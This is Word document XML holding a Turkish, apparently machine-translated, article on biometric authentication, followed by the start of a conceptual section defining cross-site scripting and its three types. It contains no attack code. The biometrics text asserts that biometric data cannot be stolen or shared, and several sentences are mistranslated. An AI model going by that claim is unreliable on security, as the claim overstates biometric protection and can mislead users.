          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Other New Stuff</w:t>
      </w:r>
      <w:r w:rsidRPr="00327F6E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E38F6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Diğer yeni şeyler arasında çoklu seyahat parmak izi uygulamaları, kamu kimlik kartları ve gözetim sistemleri yer alıyor. Çok fonksiyonlu uygulamalar, yolcuların sık uçan yolcu ve sınır kontrol sistemlerine katılmalarını sağlar. Seyahat edenler uçak bileti ve otel odaları gibi seyahat masraflarını ödemek için uygun bir parmak izi şablonunu kullanabilirler. Çok amaçlı kullanım için kasık kimlik kartı biyometri içerebilir. Örneğin, bir kapalı devre gözetim video kamera sistemi, yüz yazılımı ile otomatik olarak izlenebili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5E38F6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Araştırmacılar, aydınlatma, yaşlanma, derinlemesine dönme ve genel ifadeler nedeniyle değişikliklere daha iyi uyum sağlamak için mevcut yüz tanıma algoritmalarının bazı kısıtlamalarını gevşetme üzerinde çalışıyor. Yüz kılı, gözlük ve makyaj gibi şeylerden dolayı görünümdeki değişikliklerle nasıl başa çıkılacağını da inceliyorlar - zaten kısmi çözümleri olan problemler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005E38F6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005E38F6" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E38F6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Microsoft Faktörü  (The Microsoft Factor)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00327F6E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft, 5 Mayıs 2000'de biyometrik kimlik doğrulama teknolojisini Windows işletim si</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>stemlerine entegre etmek için I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00327F6E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yazılımı ile ortaklığa girdi. Microsoft, kullanıcılara kişisel yetkilendirme yöntemine dayanarak daha yüksek düzey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>de ağ güvenliği sağlamak için I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00327F6E">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yazılımları'nın Biyometrik API (BAPI) teknolojisi ve SecureSuite çekirdek kimlik doğrulama teknolojisi satın aldı.</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5E38F6">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu entegrasyon, kullanıcıların bilgisayarlarına giriş yapmalarını ve parola yerine kriptografik bir özel anahtarın parmak izi, iris deseni veya ses tanıma kombinasyonunu kullanarak güvenli E-ticaret işlemlerini yapmalarını sağlar. Biyometrik bir şablonun kopyalanması çok daha zordur, çünkü hiçbir iki birey aynı özelliklere sahip değildir. Biyometrik veriler şifreleri ve akıllı kart PIN'lerini değiştirmek için çok uygundur, çünkü biyometrik veriler unutulmaz, kaybedilmez, çalınamaz veya başkalarıyla paylaşılamaz.</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b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D13EBF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Standartlaştırma Sorunları (Standardization Issues)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D13EBF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Biyometri endüstrisi, her biri kendi özel arayüzü, algoritması ve veri yapısına sahip 150'den fazla ayrı donanım ve yazılım satıcısı içerir. Ortak bir yazılım arayüzü sağlamak, biyometrik şablonların paylaşımına izin vermek ve farklı biyometrik teknolojilerin iyi karşılaştırılmasını ve değerlendirilmesini sağlamak için standartlar ortaya çıkmaktadı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D13EBF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Böyle bir örnek, belirli bir biyometrik uygulama ile arayüz oluşturmak için ortak bir yöntem tanımlayan BioAPI standardıdır. BioAPI, 60'tan fazla satıcı ve devlet kurumundan oluşan bir konsorsiyum tarafından geliştirilen açık sistemler standardıdır. C ile yazılmış, kayıtlı kullanıcı, iddia edilen kimliği doğrulama (kimlik doğrulama) ve kimliği keşfetme gibi tüm biyometrik teknolojilerde ortak olan temel eylemleri gerçekleştirmek için bir dizi işlev çağrısından oluşur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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D13EBF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BioAPI Konsorsiyumu'nun kurucusu olan Microsoft, kendi BAPI biyometrik arayüz standardını bıraktı ve gelişti</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rdi. Bu standart, Microsoft'un I / O </w:t>
      </w:r>
      <w:r w:rsidRPr="00D13EBF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yazılımından edindiği BAPI teknolojilerine dayanmaktadır. Diğer bir taslak standart, çeşitli biyometrik cihazlardan toplanan şablonların değiş tokuş edilmesi ve saklanması için ortak bir araç tanımlayan Ortak Biyometrik Değişim Dosya Biçimidir. Biyometrik Konsorsiyum ayrıca, parmak izi teknolojisi tedarikçileri için birlikte çalışabilirlik düzeyi sağlamaya çalışan Ortak Parmak İzi Minutiae Değişim formatı için bir teklif sunmuştu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D13EBF">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Birlikte çalışabilirlik konularına ek olarak, biyometri standartları, biyometri güvencesi ve test metodolojileri için bir temel oluşturmanın bir yolu olarak görülmektedir. Biyometrik güvence, bir biyometrik cihazın amaçlanan güvenlik seviyesine ulaşabileceği güvencesini ifade eder. Biyometrik teknolojilerin karşılaştırılması için mevcut metrikler sınırlıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00751F18">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kısmi bir çözüm olarak, ABD Savunma Bakanlığı’nın Biyometri Yönetim Ofisi ve diğer gruplar standart test metodolojileri geliştirmektedir. Bu çalışmanın çoğu Ortak Ölçütlerin bağlamsal çerçevesi içinde gerçekleşiyor. Uluslararası güvenlik camiasının tüm güvenlik ürünlerinin değerlendirilmesini ve karşılaştırılmasını standartlaştırmak için geliştirdiği bir modeldir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00751F18">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Seçim kriterleri (Selection Criteria)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00751F18">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Statik, entegre veya dinamik bir biyometrik sistemin seçimi, algılanan kullanıcı profillerine, diğer sistemler veya veri tabanları, çevre koşulları ve her özellik için diğer parametrelerle arayü</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>z oluşturma ihtiyacına bağlıdır :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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xml:space="preserve">• Kullanım kolaylığı </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00751F18"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Hata insidansı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00751F18"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Doğruluk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00751F18"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Maliyet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00751F18"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Kullanıcı kabülü</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00751F18"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Gerekli güvenlik seviyesi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidRPr="00751F18">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Uzun vadeli uygunluk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00751F18">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hata oranı dışında her parametrenin derecesi orta ila çok yüksek arasında değişir. Hata insidansı parametresi, hataya neyin sebep olduğu hakkında kısa bir açıklama (örneğin kafa travması, yaş ve gözlük) anlamına gelir. Bu aynı zamanda bir sahtekarın doğru bir şekilde doğrulanabilme olasılığıdır (yetkili bir kişinin erişiminin reddedildiği durumlarda yanlış reddetmenin aksine yanlış kabul).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD0EC2">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sonuç (Conclusion)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D2877">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Biyometri çağına giriyoruz. Bir zamanlar araştırma projesi olarak etiketlenen birçok teknoloji artık pazarlanabilir durumda. Onların popülaritesi, biyometrilerin şifreleri çalmak, unutmak veya kaybetmek konusunda daha zor olduğu gerçeğine bağlıdır. Bununla birlikte, her biyometrik türün kendi sınırlamaları vardır. Tüm bireyler için işe yaramayacaktır, çünkü bazılarının biyometrik bir sistemin şablon olarak kayıtsız kalması yetersizliği olabilir. Ayrıca görünüşlerini belirgin biçimde değiştiren bireylerle çalışmazla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2D2877">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yüz, ses ve dudak hareketlerini tanımanın entegrasyonu ilginç olsa da, dudak hareketlerinin daha yüksek tanecikliğine ihtiyaç duyulur. Birçok kişi, ses olmadan dudak okumanın biraz kafa karıştırıcı olabileceğinin farkında değildir.</w:t>
      </w:r>
      <w:r w:rsidRPr="002D2877">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D2877">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Bu, dudak </w:t>
      </w:r>
      <w:r w:rsidRPr="002D2877">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>hareketleri iki veya üç farklı kelime için aynı gibi göründüğü zaman geçerlidir. Giyilebilir biyometri - bir zamanlar bilim kurgu - şimdi bir gerçektir. Yıllar önce çizgi romanlarda görülen, şimdi askeri ve sağlık kullanımı ile ilgili onlar hakkında duyuyo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2D2877">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ayrıca, günümüzde dizüstü bilgisayarlar için kişisel bilgi işlem, özel bir anahtar, dijital sertifikalar ve güvenli şifreler içeren bir parmak izi güvenli lockbox ile birlikte. Yarın, birinin arabasına erişmek için birinin parmak ucunu arabanın kapı koluna kaydırması mümkün olabilir. Ancak bu, otomobil üreticileri, hafif havadan ağır havaya kadar çeşitli hava koşullarına uyum sağlayabilecek bir çip yapmayı başaramazsa bu olmayacak.</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2D2877">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bunların hepsi standardizasyon sorunları yarattı. Birlikte çalışabilirlik konusunda standartlar önerilmiş ve birkaçı uygulanmıştır. Bunları takip etmek, hala aşamada olan test metodolojileri için standartlardır. Standardizasyon çabaları daha olgunlaştığında, henüz görmediğimiz yeni biyometrik teknolojiler, pazara giriş yapmalarını sağlayacaktır. Bu teknolojilerin çoğu, gerçek zamanlı ve daha az kısıtlı ortamlarda daha dinamik olacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D2877">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Biyometrik teknolojilerin yapacağı ilerlemeye rağmen, bir genetik kusur, hastalık, yaş veya yaralanma nedeniyle biyometrik bir şablonu kaydetme konusunda problem yaşayan bazı kişiler için şifreler burada kalacak. Tabii ki, bu bugün bir varsayımdır. Yarın olmayabilir - özellikle de henüz projelerin üzerinde değil, çığır açan teknolojilerle.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD770F" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
          <w:caps/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00AD770F">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:color w:val="000000"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>WEB UYGULAMASI GÜVENLIĞI - CROSS SITE SCRIPTING</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22C465A5" wp14:editId="637C2F03">
            <wp:extent cx="5750732" cy="2838450"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6" name="Resim 6" descr="https://2.bp.blogspot.com/-IFIzGkZPPCo/V9GgWRYgTGI/AAAAAAAAAQU/G2dEDSMDcwo4wdUZwUIBmiVOp04pwL4mgCLcB/s1600/Screen%2BShot%2B2016-09-08%2Bat%2B20.29.0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IFIzGkZPPCo/V9GgWRYgTGI/AAAAAAAAAQU/G2dEDSMDcwo4wdUZwUIBmiVOp04pwL4mgCLcB/s1600/Screen%2BShot%2B2016-09-08%2Bat%2B20.29.0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572" cy="2842813"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB42DB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB42DB">
        <w:rPr>
          <w:rFonts w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cross site scripting, saldırganın hedef web sitesini ziyaret eden tarayıcılar üzerinde komut çalıştırdığı saldırılara verilen isimdir. Saldırganlar cross-site-scripting saldırıları ile web sayfasını ziyaret eden müşterilerin hesap bilgilerini hatta bilgisayarlarını ele geçirebilir, sayfayı ziyaret eden tarayıcıları başka bir sayfaya yönlendirebilir veya sayfanın görünümünü değiştirebilir. Cross site scripting zafiyetleri başka zafiyetler ile birleştiğinde çok daha tehlikeli hale gelmektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD770F" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0"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Cross Site Scripting üç kategoriye ayrılır :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD770F" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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lastRenderedPageBreak/>
        <w:t>Reflected XSS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD770F" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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Dom Based XSS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD770F" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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Stored XSS </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB42DB">
        <w:rPr>
          <w:rFonts w:cs="Lucida Sans Unicode"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>XSS çoğunlukla web uygulamaların hatalı ya da eksik yapılandırılması ile oluşur. Web uygulaması kendisine gönderilen veriyi filtrelemeden kabul etmesiyle meydana gelir. En zararlı XSS türü Stored XSS’tir, çünkü uygulamaya gönderilen komut kaynak kodda kalıcı olarak yer eder. </w:t>
      </w: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Pr="00CB42DB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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t>XSS Türleri:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB42DB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="450"/>
        <w:jc w:val="both"/>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t>Reflected XSS: </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB42DB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Kullanıcının girilmesi beklenen parametre yerine Javascript  kodu girerek bunu ekrana yansıtması ile tespit edilebilen XSS çeşitidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00CB42DB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="450"/>
